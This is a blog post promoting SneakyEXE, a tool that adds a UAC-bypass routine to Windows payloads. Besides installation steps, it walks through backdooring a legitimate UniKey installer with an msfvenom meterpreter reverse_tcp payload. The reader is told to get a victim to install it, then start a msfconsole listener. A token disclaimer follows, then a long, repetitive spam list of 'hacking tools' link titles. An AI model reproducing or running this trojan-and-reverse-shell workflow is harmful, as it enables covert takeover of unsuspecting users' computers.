Saturday, 29 August 2020

SneakyEXE: An "UAC-Bypassing" Codes Embedding Tool For Your Win32 Payload


About SneakyEXE
   SneakyEXE is a tool which helps you embedding a UAC-Bypassing function into your custom Win32 payloads (x86_64 architecture specifically).

   SneakyEXE was tested on:
  • Windows 7, 8, 10 (64 bit)
  • Parrot Security OS 4.7

   Requirements of SneakyEXE:
  • For Linux:   Architecture: Optional
       Python 3.7.x: Yes
       Module: termcolor
       Distro: Any
       Distro version: Any
  • For Windows:   Architecture: x86_64
       Python 3.7.x: No
       Module: No
       Windows version: 7, 8, 10

SneakyEXE's Installtion for Linux
   You must install Python 3 first:
  • For Debian-based distros: sudo apt install python3
  • For Arch Linux based distros: sudo pacman -S python3
   And then, open your Terminal and enter these commands:


SneakyEXE's Installtion for Windows
  • Download SneakEXE-master zip file.
  • Unzip it into your optional directory.
  • Change dir to \SneakyEXE\Win32\.
  • Execute sneakyexe.exe (or sys\sneakyexe.exe for an improved startup speed).
  • (Optional : you can copy sneakyexe.exe to whatever directory you want and delete the unzipped one)
   NOTE: The payload can only be successfully executed by the user with Administrator privilege. Users with limited token wouldn't succeed.

SneakyEXE GUI verion installation for Windows
   You must install Python 3 first. Download and run Python 3.7.x setup file from Python.org. On Install Python 3.7, enable Add Python 3.7 to PATH.
   Download SneakEXE-master zip file and unzip it.
   And then, open PowerShell or CMD on SneakyEXE folder where you have just unzipped SneakyEXE-master and enter these command:

pip install pillow
pip install pyinstaller
mkdir compile
cd compile
pyinstaller --windowed --onefile --icon=Icon.ico /source/Win32/GUI.py
cd dist
GUI.exe


How to use SneakyEXE?

Example:
   I dowloaded Unikey from Unikey.org.
   And then, i used msfvenom to inject payload to UniKeyNT.exe (payload used: windows/meterpreter/reverse_tcp). I called the payload file is uNiKeY.exe.

   After that, to embed UAC-Bypassing codes to uNiKeY.exe, i used this command:
python3 sneakyexe bin=/home/hildathedev/uNiKeY.exe out=/home/hildathedev/SneakyEXE

  And then, by some how, makes your victim installs the payload that was embedded UAC-Bypassing codes and enter these commands:

sudo msfconsole -q
use multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST <Your IP address>
set LHOST <Your port>
exploit


   and wait...

Disclaimer:
  • This tool was made for academic purposes or ethical cases only. I ain't taking any resposibility upon your actions if you abuse this tool for any black-hat acitivity
  • Feel free to use this project in your software, just don't reclaim the ownerhsip.

Credits: This tool does embed UACme which was originally coded by hfiref0x but the rest was pretty much all coded by me (Zenix Blurryface).

Author: Copyright © 2019 by Zenix Blurryface.


Read more


  1. Hacking Tools Software
  2. Pentest Tools Android
  3. Pentest Tools Kali Linux
  4. Underground Hacker Sites
  5. Hacker Techniques Tools And Incident Handling
  6. Hacker Tools Online
  7. Pentest Tools Subdomain
  8. Pentest Tools Github
  9. Hacker Tools Online
  10. Hack Rom Tools
  11. Termux Hacking Tools 2019
  12. Hack App
  13. Hack Tools For Games
  14. Pentest Tools Kali Linux
  15. Pentest Tools List
  16. Pentest Tools Framework
  17. Hacks And Tools
  18. Wifi Hacker Tools For Windows
  19. Wifi Hacker Tools For Windows
  20. What Is Hacking Tools
  21. New Hacker Tools
  22. Free Pentest Tools For Windows
  23. Hack Tools For Windows
  24. Hack Website Online Tool
  25. Growth Hacker Tools
  26. Pentest Tools Alternative
  27. What Is Hacking Tools
  28. Hacker Security Tools
  29. Hacking Tools Software
  30. Best Pentesting Tools 2018
  31. Pentest Tools Port Scanner
  32. Hacking Tools For Mac
  33. Hack Tools For Mac
  34. New Hack Tools
  35. Hacker Tools Apk Download
  36. Pentest Tools Alternative
  37. Hacker Tools Windows
  38. Hack Tools
  39. Top Pentest Tools
  40. Hacking Tools For Kali Linux
  41. World No 1 Hacker Software
  42. Best Hacking Tools 2019
  43. Hacking Tools For Windows 7
  44. Hacking Tools For Beginners
  45. Hacking Tools For Beginners
  46. Hacking Tools For Kali Linux
  47. Hacking Tools Pc
  48. Usb Pentest Tools
  49. Hack Tools
  50. Hacking Tools For Pc
  51. Pentest Reporting Tools
  52. Pentest Tools List
  53. Tools For Hacker
  54. Pentest Tools Bluekeep
  55. Pentest Tools For Android
  56. New Hack Tools
  57. Hacking Tools Windows
  58. How To Install Pentest Tools In Ubuntu
  59. Hack App
  60. Hacker Tools Free
  61. Hacking Tools For Pc
  62. How To Hack
  63. New Hacker Tools
  64. Pentest Tools Kali Linux
  65. Pentest Tools Github
  66. Underground Hacker Sites
  67. Pentest Tools For Windows
  68. Pentest Tools Apk
  69. Install Pentest Tools Ubuntu
  70. Easy Hack Tools
  71. Hacking Tools Software
  72. Pentest Tools Nmap
  73. Pentest Tools Website Vulnerability
  74. Best Hacking Tools 2019
  75. Hack Tools
  76. Hacker Tools For Ios
  77. Hacker Techniques Tools And Incident Handling
  78. Hak5 Tools
  79. Pentest Tools Alternative
  80. Hacker Tools For Pc
  81. Hacker Tools Linux
  82. Hacking App
  83. Github Hacking Tools
  84. Pentest Tools Free
  85. Hacking Tools Hardware
  86. Pentest Tools Find Subdomains
  87. Easy Hack Tools
  88. Hacker Search Tools
  89. Hacking Tools Software
  90. Game Hacking
  91. Hack Apps
  92. Bluetooth Hacking Tools Kali
  93. Hacking Tools For Kali Linux
  94. Pentest Tools Review
  95. Hacker Search Tools
  96. Best Pentesting Tools 2018
  97. Hacking Apps
  98. Hacking Tools Hardware
  99. Pentest Automation Tools
  100. Pentest Tools Review
  101. Pentest Recon Tools
  102. Hack Tools 2019
  103. Termux Hacking Tools 2019
  104. Pentest Tools Find Subdomains
  105. Pentest Tools For Android
  106. Pentest Tools Subdomain
  107. Hack Tools
  108. Pentest Tools Online
  109. Pentest Automation Tools
  110. Hacker Tools Apk
  111. Hack Tools 2019
  112. Nsa Hack Tools Download
  113. Underground Hacker Sites
  114. Hacking Tools Kit
  115. Hacker Techniques Tools And Incident Handling
  116. Hacker Tools Online
  117. Hacking Apps
  118. Pentest Tools Github
  119. Bluetooth Hacking Tools Kali
  120. Best Hacking Tools 2019
  121. Hacking Tools Download
  122. Hacking Tools For Pc
  123. Hacking Tools Pc
  124. Hack Tools Github
  125. Hack Tools For Mac
  126. Hacker Tools Mac
  127. Ethical Hacker Tools
  128. Pentest Tools Github
  129. How To Hack
  130. Hackrf Tools
  131. Hack Tools Online
  132. Hacker Tools List
  133. Hack And Tools
  134. How To Hack
  135. Game Hacking
  136. Kik Hack Tools
  137. Hacking Tools And Software
  138. Best Pentesting Tools 2018
  139. How To Make Hacking Tools
  140. Pentest Tools List
  141. Hacker Tools Github
  142. Hacker Tool Kit
  143. Free Pentest Tools For Windows
  144. Hacker Hardware Tools
  145. Kik Hack Tools
  146. Pentest Tools For Android
  147. Pentest Tools
  148. Github Hacking Tools
  149. Pentest Tools Android
  150. Hacking Tools Github

No comments:

Post a Comment